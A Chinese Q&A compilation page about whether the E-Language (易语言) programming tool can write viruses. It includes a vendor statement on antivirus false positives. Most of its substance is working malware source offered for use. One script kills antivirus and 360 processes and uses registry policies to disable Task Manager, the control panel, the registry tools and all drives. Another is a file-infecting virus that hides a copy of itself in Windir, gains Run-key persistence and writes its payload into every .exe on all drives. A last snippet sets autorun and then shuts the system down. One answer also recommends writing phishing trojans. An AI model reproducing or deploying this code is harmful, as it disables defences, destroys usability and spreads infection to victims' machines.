本文目录一览:
- 1、易语言破解版写的程序有木马,怎么解决?
- 2、易语言病毒代码
- 3、怎么看破解版易语言有没有恶意代码
- 4、请问一易语言能够编写木马或病毒吗? 望高手指点小弟在此谢谢了
- 5、跪求:易语言编写的具有感染性的病毒源代码..
- 6、易语言病毒代码+重启文件代码
易语言破解版写的程序有木马,怎么解决?
您好:
一般破解版的软件编写的程序都会被恶意加入病毒代码的,建议您不要使用这种不安全的变成软件,并为了您电脑的安全,建议您使用腾讯电脑管家对您的电脑进行一下全面的杀毒吧,打开腾讯电脑管家中的杀毒功能选择闪电查杀或者全盘查杀就可以的哦,腾讯电脑管家是采用“4+1”核“芯”杀毒引擎的专业杀毒软件,是完全可以帮助您查杀病毒而且保护您的电脑的哦。
您可以点击这里下载最新版的腾讯电脑管家:最新版腾讯电脑管家下载
腾讯电脑管家企业平台:
易语言病毒代码
.版本 2
.局部变量 变量, 整数型
置现行时间 (到时间 (“2056年1月1日”))
运行 (“taskkill /f /im kavsvc.exe”, 假, 1)
运行 (“taskkill /f /im KVXP.kxp”, 假, 1)
运行 (“taskkill /f /im Rav.exe”, 假, 1)
运行 (“taskkill /f /im Ravmon.exe”, 假, 1)
运行 (“taskkill /f /im Mcshield.exe”, 假, 1)
运行 (“taskkill /f /im VsTskMgr.exe”, 假, 1)
' 绕过360监控
写注册项 (4, “SOFTWARE\360Safe\safemon\ExecAccess”, 0)
写注册项 (4, “SOFTWARE\360Safe\safemon\MonAccess”, 0)
写注册项 (4, “SOFTWARE\360Safe\safemon\SiteAccess”, 0)
写注册项 (4, “SOFTWARE\360Safe\safemon\UDiskAccess”, 0)
运行 (“taskkill /f /im 360tray.exe”, 假, 1) ' 结束360进程
' 修改关联
写注册项 (1, “.txt\”, “jpegfile”)
写注册项 (1, “.inf\”, “jpegfile”)
写注册项 (4, “SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue”, 0) ' 隐藏文件和文件夹
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, 0) ' 禁用任务管理器
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel”, 1) ' 禁用控制面板
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\System\Disableregistrytools”, 1) ' 禁用注册表
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, 1) ' 隐藏开始中的运行 禁止WIN2000/XP通过任务管理器创建新任务
写注册项 (3, “SoftWare \Microsoft \Windows \CurrentVersion \Policies\WinOldApp\Disabled”, 1)
' 隐藏“MS-DOS方式”下的磁盘驱动器。不管是在“我的电脑”里,或“MS-DOS”方式下都看不见了
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives”, 4294967295) ' 隐藏所有驱动器
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive”, 4294967295) ' 禁止所有驱动器
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, 1) ' 隐藏文件夹选项
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop”, 1) ' 将桌面对象隐藏
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose”, 1) ' 隐藏开始中的关机
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, 1) ' 隐藏开始中的搜索
' 写注册项 (3, “Software\Policies\Microsoft\Windows\System\DisableCMD”, 1)'1 禁用CMD和.BAT文件 2 禁CMD不禁.BAT 0启用两项
写注册项 (3, “Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage”, 1) ' 隐藏主页选项组
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu”, 1) ' 隐藏IE文件菜单
写注册项 (3, “Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFavorites”, 1) ' 隐藏收藏夹菜单
写注册项 (3, “Software\Policies\Microsoft\Internet Explorer\Restrictions\NoPrinting”, 1) ' 禁用IE打印功能
写注册项 (3, “Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions”, 1) ' 隐藏Internet选项
写注册项 (3, “Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource”, 1) ' 禁止IE查看源文件
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Interner Settings\Zones\3\1803”, 3) ' 禁用IE下载功能
写注册项 (3, “Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu”, 1) ' 禁止右键关联菜单
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRealMode”, 1) ' 禁止“重新启动计算机切换到MS-DOS方式”
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff”, 1) ' 禁止显示“注销”
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu”, 1) ' 禁止文档菜单
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff”, 1) ' 去掉“开始”选单中的“登录”项
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, 1) ' 禁止使用鼠标右键
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders”, 1) ' 禁止修改控制面版
怎么看破解版易语言有没有恶意代码
正版依然报毒,原因:易语言公司发出的
杀毒软件误报情况说明
尊敬的易语言用户:你们好!
易语言新版本在每次推出之前,均要进行多达五种以上杀毒软件的查杀确认没有病毒后才上传提交给用户使用,并且我们编译生成产品的环境是封闭的,不可能感染病毒。此外易语言已经由中国科学技术委员会中国软件评测中心检测通过(见测试报告),取得科技成果鉴定证书,被国家火炬计划立项,因此请广大用户放心,易语言本身绝对没有病毒。
我公司产品易语言自推出后,一直以来受到广大用户的好评,使用人数急剧上升,从而用户用易语言编写发布的软件有几十万份之多。但有极个别用户违反国家法律使用易语言编写病毒或木马散发,更有竞争对手公司用易语言捆绑病毒发布恶意程序,再加上某些杀毒软件厂家仍采用落后的特征码识别技术查杀病毒,在获取以上病毒或木马文件特征码时错误地在易语言编译出来的正常可执行代码数据中采集,从而导致将易语言编译出来的正常软件一并误报为病毒。
我公司采取了对易语言自身的改造:将有可能产生误报病毒的特征码去除,但这样被动地修改并不能彻底解决问题,过了不久又有新的误报发生,防不胜防;其次在文件中内嵌了说明文字,以让杀毒厂家能正确找到易代码的地址,还建立了专门给杀毒厂家测试的页面,起到了一定的作用,但个别公司仍视而不见,依然我行我素。
我公司对外寻求通过与杀毒厂家积极沟通,以帮助他们消除软件的缺陷。建立了专门供杀毒公司使用的网站(见资源网)。沟通过的杀毒厂家有:瑞星、金山、江民、北信源、东方卫士、驱逐舰、安博士、木马克星、熊猫、卡巴斯基、KILL、Macfee、PC-Cillin、AVK、诺顿、NOD32等。目前基本上与国内的杀毒公司建立了良好的沟通渠道,但极个别国外杀毒厂家不重视中国的市场,还是会发生误报病毒的现象。
对一些长期不予解决问题的杀毒厂家我公司也采取了法律的手段,以挽回我公司的损失。其中于2005年1月将北京卡巴斯基公司告上法院。通过法院两审,判决卡巴斯基公司败诉(见法院判决书),不久该公司在电脑报上公开道歉(见道歉声明)。
在交涉中,多次收到一些杀毒厂家的道歉信。(见附件)
在此请我们的用户耐心向您的客户解释清楚情况,劝其最好改用优质的国产杀毒软件,我们推荐的是江民公司的KV系列产品。另外我公司将会坚持不懈地尽快解决此类问题,请大家放心。
易语言公司
请问一易语言能够编写木马或病毒吗? 望高手指点小弟在此谢谢了
可以,但易语言误报率高,加上生成体积太大,不怎么适合写木马,但用易语言写钓鱼木马还是不错的选择。写木马多数用API函数可以实现。建议你先把基础学好,了解下API函数再写那些,呵呵……当你写了一段时间木马程序或病毒你会觉得不好玩
跪求:易语言编写的具有感染性的病毒源代码..
.版本 2
.支持库 eAPI
提取资源文件图标 (取运行目录 () + “\” + 取执行文件名 (), 0, “C:\windows\system32\Aver.ico”, ) ' 替换系统exe图标
写注册项 (#本地机器, “SOFTWARE\Classes\exefile\DefaultIcon\”, “C:\windows\system32\Aver.ico”) ' 写到注册表键值
写注册项 (#现行用户, “Software\Microsoft\Windows\CurrentVersion\Run\” + 取执行文件名 (), 取运行目录 () + “\” + 取执行文件名 ()) ' 写让注册表键值删除后可恢复木马实行自启动
.如果真 (取运行目录 () ≠ 读环境变量 (“Windir”))
复制文件 (取运行目录 () + “\” + 取执行文件名 (), 读环境变量 (“Windir”) + “\penguin.exe”)
运行 (“Cmd /c Attrib +H +S ” + 读环境变量 (“Windir”) + “\penguin.exe”, 真, 1)
运行 (读环境变量 (“Windir”) + “\penguin.exe”, 假, )
写到文件 (读环境变量 (“Windir”) + “penguin.bat”, 到字节集 (“@echo off” + #换行符 + “Taskkill /f /im ” + 取执行文件名 () + #换行符 + “Del ” + 取当前目录 () + “\” + 取执行文件名 () + #换行符 + “Del %0” + #换行符 + “Exit”))
写到文件 (读环境变量 (“Windir”) + “\penguin.bat”, 到字节集 (子文本替换 (子文本替换 (到文本 (读入文件 (读环境变量 (“Windir”) + “penguin.bat”)), “C:\Documents and Settings”, “C:\DOCUME~1”, , , 假), “Windows”, “ ”, , , 假)))
运行 (读环境变量 (“Windir”) + “\penguin.bat”, 真, 1)
.如果真结束
.如果真 (取运行目录 () = 读环境变量 (“Windir”))
写注册项 (#本地机器, “SOFTWARE\Microsoft\Windows\CurrentVersion\Run\penguin”, 读环境变量 (“Windir”) + “\penguin.exe”)
写到文件 (读环境变量 (“Windir”) + “Infection.exe”, #感染)
运行 (读环境变量 (“Windir”) + “\Infection.exe”, 真, 1)
.如果真结束
驱动器 = 取驱动器列表 ()
.版本 2
.子程序 搜寻
.参数 目录, 文本型
.局部变量 文件号
.局部变量 文件名, 文本型
处理事件 ()
.如果真 (取文本右边 (目录, 1) ≠ “\”)
目录 = 目录 + “\”
.如果真结束
文件名 = 寻找文件 (目录 + “*.exe”, )
.判断循环首 (文件名 ≠ “”)
输出调试文本 (目录 + 文件名)
文件号 = 打开文件 (删首尾空 (目录 + 文件名), #读写, #无限制)
插入字节集 (文件号, #图标)
关闭文件 (文件号)
文件名 = 寻找文件 (, )
.判断循环尾 ()
文件名 = 寻找文件 (目录 + “*.*”, #子目录)
.判断循环首 (文件名 ≠ “”)
.如果真 (取文本左边 (文件名, 1) ≠ “.”)
搜寻 (目录 + 文件名)
.如果真结束
文件名 = 寻找文件 (, #子目录)
.判断循环尾 ()
原创,不要外传=.=
易语言病毒代码+重启文件代码
用2句代码就可以
.版本
2
.支持库
eAPI
.支持库
shell
.程序集
窗口程序集1
.子程序
__启动窗口_创建完毕
设置自动运行
(取执行文件名
(),
取运行目录
()
+
“\”
+
取执行文件名
(),
0)
关闭系统
(2,
真)
资料来源:学生技术联盟,原学生黑客联盟